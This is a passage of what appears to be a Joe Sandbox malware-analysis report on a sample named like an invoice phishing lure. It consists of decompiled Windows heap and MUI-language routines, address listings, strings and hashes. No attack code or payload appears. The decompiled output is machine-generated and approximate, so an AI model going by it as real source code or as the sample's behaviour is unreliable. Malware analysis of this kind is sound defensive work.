							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E00BA4496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0xbd6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0xbd6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0xbd6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E00AEB150();
								} else {
									E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E00B8D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E00AEB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E00AEB150();
								} else {
									E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E00AEB150("Just allocated block at %p for %Ix bytes\n",  *0xbd6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0xbd6378 = 1;
									 *0xbd60c0 = 0;
									asm("int3");
									 *0xbd6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0xbd5708; // 0x0
					 *0xbdb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E00B3D130(0, _t177, _t181);
				}
			}

0x00ba2d82
0x00ba2d84
0x00ba2d89
0x00ba2d8e
0x00ba2d90
0x00ba2d92
0x00ba2d97
0x00ba2d9a
0x00ba2da4
0x00ba2dc0
0x00ba2dc3
0x00ba2dd1
0x00ba2dd6
0x00ba2dd8
0x00ba30a7
0x00ba30a7
0x00ba30aa
0x00ba30aa
0x00ba30ad
0x00ba30b4
0x00000000
0x00ba30b9
0x00ba2de3
0x00ba2de8
0x00ba2deb
0x00ba2dee
0x00ba2df1
0x00ba2df3
0x00ba2dfb
0x00ba2dfb
0x00ba2df5
0x00ba2df5
0x00ba2df5
0x00ba2e04
0x00ba2e0a
0x00ba2e0d
0x00ba2e11
0x00ba2e11
0x00ba2e12
0x00ba2e15
0x00ba2e18
0x00ba2e1a
0x00ba3027
0x00ba3027
0x00ba302d
0x00ba3030
0x00ba304f
0x00ba3054
0x00ba3032
0x00ba3047
0x00ba304c
0x00ba305a
0x00ba3063
0x00000000
0x00ba2e20
0x00ba2e20
0x00ba2e23
0x00000000
0x00000000
0x00ba2e29
0x00ba2e2b
0x00ba2e47
0x00ba2e2d
0x00ba2e33
0x00ba2e38
0x00ba2e3f
0x00ba2e42
0x00ba2e42
0x00ba2e4e
0x00ba2e5d
0x00ba2e5f
0x00ba2e62
0x00ba2e66
0x00ba2e6b
0x00ba2e6d
0x00000000
0x00ba2e73
0x00ba2e73
0x00ba2e76
0x00ba2e7a
0x00ba2e83
0x00ba2e83
0x00ba2e83
0x00ba2e85
0x00ba2e87
0x00ba2e8a
0x00ba2e8d
0x00ba2e92
0x00ba2e9c
0x00ba2e9f
0x00ba2ea1
0x00ba2ea2
0x00ba2ea6
0x00ba2ea6
0x00ba2e9f
0x00ba2eab
0x00ba2eaf
0x00ba2edf
0x00ba2ee2
0x00ba2ee5
0x00ba2eb1
0x00ba2eb3
0x00ba2eb8
0x00ba2ebd
0x00ba2ec4
0x00ba2ed6
0x00ba2ec6
0x00ba2ec7
0x00ba2ecc
0x00ba2ecf
0x00ba2ed2
0x00ba2ed2
0x00ba2ed9
0x00ba2ed9
0x00ba2ee8
0x00ba2eeb
0x00ba2eef
0x00ba2ef2
0x00ba2efe
0x00ba2f04
0x00ba2f04
0x00ba2f04
0x00ba2f06
0x00ba2f0d
0x00ba2f0f
0x00ba2f13
0x00ba2f13
0x00ba2f1b
0x00ba2f21
0x00ba2f27
0x00ba2f95
0x00ba2f98
0x00ba2f9b
0x00ba2fa0
0x00000000
0x00000000
0x00ba2fa6
0x00ba2fa9
0x00ba2fac
0x00000000
0x00000000
0x00ba2fb2
0x00ba2fb9
0x00000000
0x00000000
0x00ba2fc3
0x00ba2fca
0x00000000
0x00000000
0x00ba2fd0
0x00ba2fd6
0x00ba2fd9
0x00ba2ff8
0x00ba2ffd
0x00ba2fdb
0x00ba2ff0
0x00ba2ff5
0x00ba300e
0x00ba300f
0x00ba301a
0x00000000
0x00ba2f29
0x00ba2f29
0x00ba2f2c
0x00ba2f4b
0x00ba2f50
0x00ba2f2e
0x00ba2f43
0x00ba2f48
0x00ba2f56
0x00ba2f64
0x00ba2f6c
0x00ba2f6c
0x00ba2f72
0x00ba2f76
0x00ba2f7c
0x00ba2f83
0x00ba2f89
0x00ba2f8a
0x00ba2f8a
0x00000000
0x00ba2f76
0x00ba2f27
0x00ba2e6d
0x00ba2da6
0x00ba2dab
0x00ba2db3
0x00ba2db9
0x00ba30bc
0x00ba30c1
0x00ba30c1

Strings

Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 00BA3015
HEAP[%wZ]: , xrefs: 00BA2F3E, 00BA2FEB, 00BA3042
Just allocated block at %p for %Ix bytes, xrefs: 00BA2F5F
HEAP: , xrefs: 00BA2F4B, 00BA2FF8, 00BA304F
RtlAllocateHeap, xrefs: 00BA2DCA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 00BA305E

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 04fac86bff43393c0b1de78347767932738ec963f10451dc8daacbaf5b1089f5
Instruction ID: d8a1997b36ec2b31c09a998941c6aeaf91308a0ac03aecd9caa1e16a1902340e
Opcode Fuzzy Hash: 04fac86bff43393c0b1de78347767932738ec963f10451dc8daacbaf5b1089f5
Instruction Fuzzy Hash: B291E2319156809FCB26DFA8C495BAEBBF2FF4AB10F18809DF44657292D7329981CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00AF3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00AF3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00AF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00AF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00AF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00AF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00AF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00B04620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00B2F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00B31370(_t276, 0xac4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00B2BB40(0,  &_v68, _t170);
									if(L00AF43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00B2BB40(_t257,  &_v68, _t243);
								if(L00AF43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00B31370(_t278, 0xac4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00B04620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00B2F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00B31370(_v16, 0xac4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00B2BB40(_t262,  &_v68, _t244);
								if(L00AF43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00B31370(_t282, 0xac4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00B2BB40(_t262,  &_v68, _t201);
							if(L00AF43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00B04620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00B2F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00B31370(_t280, 0xac4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00B2BB40(_t267,  &_v68, _t245);
							if(L00AF43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00B31370(_t284, 0xac4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00B2BB40(_t267,  &_v68, _t224);
						if(L00AF43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00af3d3c
0x00af3d42
0x00af3d44
0x00af3d46
0x00af3d49
0x00af3d4c
0x00af3d4f
0x00af3d52
0x00af3d55
0x00af3d58
0x00af3d5b
0x00af3d5f
0x00af3d61
0x00af3d66
0x00b48213
0x00b48218
0x00af4085
0x00af4088
0x00af408e
0x00af4094
0x00af409a
0x00af40a0
0x00af40a6
0x00af40a9
0x00af40af
0x00af40b6
0x00af40bd
0x00af40bd
0x00af3d83
0x00b4821f
0x00b48229
0x00b48238
0x00b48238
0x00b4823d
0x00b4823d
0x00af3da0
0x00af3daf
0x00af3db5
0x00af3dba
0x00af3dba
0x00af3dd4
0x00af3e94
0x00af3eab
0x00af3f6d
0x00af3f84
0x00af406b
0x00af406b
0x00af406e
0x00af406e
0x00af4070
0x00af4074
0x00b48351
0x00b48351
0x00af407a
0x00af407f
0x00b4835d
0x00b48370
0x00b48377
0x00b48379
0x00b4837c
0x00b4837c
0x00b4835d
0x00000000
0x00af407f
0x00af3f8a
0x00af3f8d
0x00af3f90
0x00af3f95
0x00b4830d
0x00b4830f
0x00af3f9b
0x00af3fac
0x00af3fae
0x00af3fb1
0x00af3fb1
0x00af3fb6
0x00b48317
0x00b4831a
0x00000000
0x00af3fbc
0x00af3fc1
0x00af3fc9
0x00af3fd7
0x00af3fda
0x00af3fdd
0x00af4021
0x00af4021
0x00af4029
0x00af4030
0x00af4044
0x00af4046
0x00af4046
0x00af4044
0x00af4049
0x00b48327
0x00b48334
0x00b48339
0x00b4833c
0x00af404f
0x00af404f
0x00af404f
0x00af4051
0x00af4056
0x00af4063
0x00af4063
0x00af4068
0x00000000
0x00af4068
0x00af3fdf
0x00af3fe2
0x00af3fe4
0x00af3fe7
0x00af3fef
0x00af4003
0x00af4005
0x00af4005
0x00af400c
0x00af4013
0x00af4016
0x00af4017
0x00af401b
0x00af401e
0x00000000
0x00af401e
0x00af3fb6
0x00af3eb1
0x00af3eb4
0x00af3eb7
0x00af3ebc
0x00b482a9
0x00b482ab
0x00af3ec2
0x00af3ed3
0x00af3ed5
0x00af3ed8
0x00af3ed8
0x00af3edd
0x00b482b3
0x00b482b6
0x00000000
0x00af3ee3
0x00af3ee8
0x00af3eed
0x00af3ef0
0x00af3ef3
0x00af3f02
0x00af3f05
0x00af3f08
0x00b482c0
0x00b482c3
0x00b482c5
0x00b482c8
0x00b482d0
0x00b482e4
0x00b482e6
0x00b482e6
0x00b482ed
0x00b482f4
0x00b482f7
0x00b482f8
0x00b482fc
0x00b482ff
0x00b482ff
0x00af3f0e
0x00af3f11
0x00af3f16
0x00af3f1d
0x00af3f31
0x00b48307
0x00b48307
0x00af3f31
0x00af3f39
0x00af3f48
0x00af3f4d
0x00af3f50
0x00af3f50
0x00af3f53
0x00af3f58
0x00af3f65
0x00af3f65
0x00af3f6a
0x00000000
0x00af3f6a
0x00af3edd
0x00af3dda
0x00af3ddd
0x00af3de0
0x00af3de5
0x00b48245
0x00af3deb
0x00af3df7
0x00af3dfc
0x00af3dfe
0x00af3e01
0x00af3e01
0x00af3e06
0x00b4824d
0x00b4824f
0x00b48254
0x00000000
0x00af3e0c
0x00af3e11
0x00af3e16
0x00af3e19
0x00af3e29
0x00af3e2c
0x00af3e2f
0x00b4825c
0x00b4825f
0x00b48261
0x00b48264
0x00b4826c
0x00b48280
0x00b48282
0x00b48282
0x00b48289
0x00b48290
0x00b48293
0x00b48294
0x00b48298
0x00b4829b
0x00b4829b
0x00af3e35
0x00af3e38
0x00af3e3d
0x00af3e44
0x00af3e58
0x00b482a3
0x00b482a3
0x00af3e58
0x00af3e60
0x00af3e6f
0x00af3e74
0x00af3e77
0x00af3e77
0x00af3e7a
0x00af3e7f
0x00af3e8c
0x00af3e8c
0x00af3e91
0x00000000
0x00af3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 00AF3DC0
Kernel-MUI-Number-Allowed, xrefs: 00AF3D8C
Kernel-MUI-Language-Disallowed, xrefs: 00AF3E97
Kernel-MUI-Language-SKU, xrefs: 00AF3F70
WindowsExcludedProcs, xrefs: 00AF3D6F

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 628beb9499b3e4ed9fa7b62ea9c20e76a5e5330f8f71909dbc1c9fa22b9b87a2
Instruction ID: abf28cca649b66ec69aa505953a111823437972cff5e12220c6a69fdfeff78a4
Opcode Fuzzy Hash: 628beb9499b3e4ed9fa7b62ea9c20e76a5e5330f8f71909dbc1c9fa22b9b87a2
Instruction Fuzzy Hash: E3F11A72D00619EBCB15DFD8C981AEEBBF9FF08750F1500AAF605A7251DB749E019BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AE40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00AE40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00AEB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00AEB150(", passed to %s", _t29);
					}
					_push("\n");
					E00AEB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xbd6378 = 1;
						asm("int3");
						 *0xbd6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x00ae40e6
0x00ae40e8
0x00ae40f1
0x00b4042d
0x00b4044c
0x00b40451
0x00b4042f
0x00b40444
0x00b40449
0x00b4045d
0x00b40466
0x00b4046e
0x00b40474
0x00b40475
0x00b4047a
0x00b4048a
0x00b4048c
0x00b40493
0x00b40494
0x00b40494
0x00000000
0x00b4049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 00B4043F
HEAP: , xrefs: 00B4044C
RtlAllocateHeap, xrefs: 00B40468
Invalid heap signature for heap at %p, xrefs: 00B40458
, passed to %s, xrefs: 00B40469

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 40d1bdbd32ae657fb77093f0566bf030c964875f9e7623a3a63fb00058712af4
Instruction ID: d64d237904a45df428f7111818a75822f42cabb1fa33bd8a42213a518f8ab3b3
Opcode Fuzzy Hash: 40d1bdbd32ae657fb77093f0566bf030c964875f9e7623a3a63fb00058712af4
Instruction Fuzzy Hash: 06012832122281AED219F769A56EF52B7F4EB00B70F29446EF20447781CBB49840D125

Uniqueness

Uniqueness Score: -1.00%

Function 00B0A830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00B0A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xbd8748 - 1;
					if( *0xbd8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00AEB150();
									_t260 = _t257 + 4;
								} else {
									E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00AEB150();
								_t257 = _t260 + 4;
								__eflags =  *0xbd7bc8;
								if(__eflags == 0) {
									E00BA2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E00BAA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E00B3D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E00B0AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00BAA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
